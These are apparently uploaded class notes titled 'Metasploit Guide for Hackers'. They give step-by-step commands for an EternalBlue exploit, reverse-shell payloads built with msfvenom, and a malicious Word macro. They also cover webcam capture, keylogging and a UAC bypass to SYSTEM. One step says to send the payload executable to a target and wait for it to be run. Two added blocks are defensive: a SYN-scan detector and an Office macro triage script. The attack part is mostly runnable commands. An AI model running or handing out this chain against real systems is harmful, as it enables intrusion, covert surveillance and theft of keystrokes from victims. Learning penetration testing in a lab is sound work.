Metasploit Guide for Hackers

The document discusses the Metasploit framework, an open-source penetration testing platform containing various exploits, payloads, and auxiliary modules. It describes the different modules like auxiliary, exploit, and payloads, providing examples of commands to use nmap for port scanning and the eternalblue exploit. The document also covers post-exploitation techniques using meterpreter as well as payload creation and bypassing user account controls.

Uploaded by

afdf
Day 4
=====
Metasploit Framework
====================
It is an exploitation tool which is used for hacking into systems. It is
built by Rapid7.

Location for Metasploit Framework:


/usr/share/metasploit-framework/

We have 7 modules in Metasploit Framework:


1. Auxiliary
2. Exploit
3. Payload
4. NOPS
5. Encoders
6. Evasions
7. Post

Auxiliary
=========
Helper modules. They are used for gathering information, scanning, and
confirming whether a machine can be exploited or not.
/usr/share/metasploit-framework/modules/auxiliary

Exploit
=======
These are the codes which are used for hacking into or breaching into the
system. These are the codes with which you can get inside a system.
/usr/share/metasploit-framework/modules/exploits

Payloads
========
These are the stubs which we create to gain access to the system.
/usr/share/metasploit-framework/modules/payloads

Some Basic Terminologies
------------------------
Vulnerabilities
Security misconfigurations and loopholes which can lead the attacker to
breach into the system.
Locked Door
Chimney
Glass Windows

Exploit
It is the code via which you exploit the system.
Breach was done via glass window.

Payload
These are used for sending the data from the target system to the attacker's
system.
Aaditya Kaushik -> The one who was picking up the goods from Shraddha's [Target]
house and carrying them to Abhishek's [attacker] house.

Backdoor
It is a secret passage via which an attacker can access the system anytime.

4 Other Terminologies
----------------------
1. RHOST -> Remote IP Address. The target's IP address.
2. RPORT -> Remote Port. The port on the target machine on which the service is
running. [Default]
3. LHOST -> Listener IP Address. The attacker's IP address.
4. LPORT -> Listener Port. A port on the attacker's machine on which you receive
the connection.

R -> Target Information. Information about the machine you want to hack.
L -> Attacker's Information. Here you enter the information of your own
system.

For starting metasploit-framework:


#msfconsole
#banner
#search portscan
For Auxiliary
-------------
#use auxiliary/scanner/portscan/syn
#options
#set rhosts 192.168.98.130
#options
#run
#back
#search eternalblue
#use auxiliary/scanner/smb/smb_ms17_010
#options
#set rhosts 192.168.98.130
#run
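
How the SYN port scan above looks from the target's side, as an added detection example (not part of the original notes). The flow-log format, the threshold values and the sample lines are assumptions constructed for illustration; the scanner and target addresses reuse the ones in these notes.

```python
from collections import defaultdict

# Constructed sample flow log: "<epoch> <src> <dst> <dst_port> <tcp_flag>"
# S = client SYN, A = client ACK completing the handshake, R = client RST.
SAMPLE_LOG = """\
100.00 192.168.98.187 192.168.98.130 21 S
100.01 192.168.98.187 192.168.98.130 22 S
100.02 192.168.98.187 192.168.98.130 80 S
100.03 192.168.98.187 192.168.98.130 135 S
100.04 192.168.98.187 192.168.98.130 135 R
100.05 192.168.98.187 192.168.98.130 139 S
100.06 192.168.98.187 192.168.98.130 445 S
100.07 192.168.98.187 192.168.98.130 445 R
101.00 192.168.98.50 192.168.98.130 445 S
101.02 192.168.98.50 192.168.98.130 445 A
130.00 192.168.98.50 192.168.98.130 80 S
130.02 192.168.98.50 192.168.98.130 80 A
"""

def find_syn_scans(log_text, min_ports=5, window=10.0):
    """Flag src->dst pairs that SYN many ports without completing a handshake."""
    first_syn = defaultdict(dict)   # (src, dst) -> {port: time of first SYN}
    completed = defaultdict(set)    # (src, dst) -> ports where the client sent ACK
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, flag = line.split()
        if flag == "S":
            first_syn[(src, dst)].setdefault(int(port), float(ts))
        elif flag == "A":
            completed[(src, dst)].add(int(port))
    alerts = []
    for (src, dst), ports in first_syn.items():
        # Keep half-open attempts only, ordered by time, for a sliding-window count.
        half_open = sorted((t, p) for p, t in ports.items()
                           if p not in completed[(src, dst)])
        start = 0
        for end in range(len(half_open)):
            while half_open[end][0] - half_open[start][0] > window:
                start += 1
            if end - start + 1 >= min_ports:
                alerts.append({"src": src, "dst": dst,
                               "half_open_ports": [p for _, p in half_open]})
                break
    return alerts

if __name__ == "__main__":
    for alert in find_syn_scans(SAMPLE_LOG):
        print(alert)
```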
For Exploit
-----------
#search eternalblue
#use exploit/windows/smb/ms17_010_EternalBlue
#options
#set rhosts 192.168.98.130 -> Target IP Address
#options
#set LHOST 192.168.98.187 -> Attacker's IP Address
#options
#set LPORT 1337
#exploit
Post Exploitation
-----------------
meterpreter>webcam_stream
meterpreter>screenshot
meterpreter>keyscan_start
meterpreter>keyscan_dump
For Creation of Payloads
------------------------
Open a new Terminal1
-------------------
#msfconsole
#show payloads
#search payload/windows
payload/windows/meterpreter/reverse_tcp

Open another Terminal2
----------------------
#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.98.187 lport=1337 -f exe -o /root/Desktop/pikachu.exe

Now copy or send the pikachu.exe file to the target and wait for the target
to execute it.

Go to Terminal1
---------------
#use exploit/multi/handler
#options
#set payload windows/meterpreter/reverse_tcp
#options
#set lhost 192.168.98.187
#set lport 1337
#options
#exploit

MACRO Exploit and Reverse HTTPS
===============================
#msfvenom -p windows/meterpreter/reverse_https lhost=192.168.98.187 lport=1337 -f vba
Copy the content of the code.
Open MS Word and type anything.
Click on "View" -> "Macros" -> "View Macros".
Give any name to the macro -> click on "Create".
Delete whatever is there on the screen, paste the whole copied code,
save it, and save the file.

#msfconsole
#use exploit/multi/handler
#set payload windows/meterpreter/reverse_https
#options
#set lhost 192.168.98.187
#set lport 1337
#options
#exploit
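
From the receiving side, a document built as in the macro steps above can be triaged before anyone opens it. This is an added example (not part of the original notes): the function names, verdict strings and the in-memory sample files are constructed for illustration, and the VBA part in the sample is placeholder bytes.

```python
import io
import zipfile

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # legacy .doc/.xls container
MACRO_EXTS = (".docm", ".dotm", ".xlsm", ".xltm", ".pptm")

def triage_office_file(name, data):
    """Classify one attachment by container type and presence of a VBA project."""
    result = {"name": name, "container": "other", "vba_parts": [],
              "verdict": "not an Office container"}
    if data.startswith(OLE2_MAGIC):
        # OLE2 files keep macros in internal streams; hand off to a VBA extractor.
        result.update(container="ole2", verdict="legacy format, needs VBA extraction")
        return result
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        names = archive.namelist()
        if "[Content_Types].xml" not in names:
            return result
        content_types = archive.read("[Content_Types].xml").decode("utf-8", "replace")
    result["container"] = "ooxml"
    result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
    declared = "vbaProject" in content_types or "macroEnabled" in content_types
    if not result["vba_parts"] and not declared:
        result["verdict"] = "no macros"
    elif name.lower().endswith(MACRO_EXTS):
        result["verdict"] = "macro-enabled document"
    else:
        result["verdict"] = "macro parts behind a non-macro extension"
    return result

def build_sample(with_macro):
    """Constructed OOXML skeleton for the demo; not a document Word would open."""
    macro = "application/vnd.ms-word.document.macroEnabled.main+xml"
    plain = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    ctype = macro if with_macro else plain
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   f'<Types><Override PartName="/word/document.xml" ContentType="{ctype}"/></Types>')
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00placeholder")
    return buf.getvalue()
```

A file flagged as `ole2` or carrying `vba_parts` is the one to pass to a macro extractor or detonate in a sandbox before delivery.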

Bypass UAC -> User Account Control
----------------------------------
meterpreter>getsystem
meterpreter>background
#back
#search UAC
#use exploit/windows/local/bypassuac
#options
#sessions -l
#set session 3
#exploit
meterpreter>getuid
|-> User
meterpreter>getsystem
meterpreter>getuid
|-> NT AUTHORITY\SYSTEM
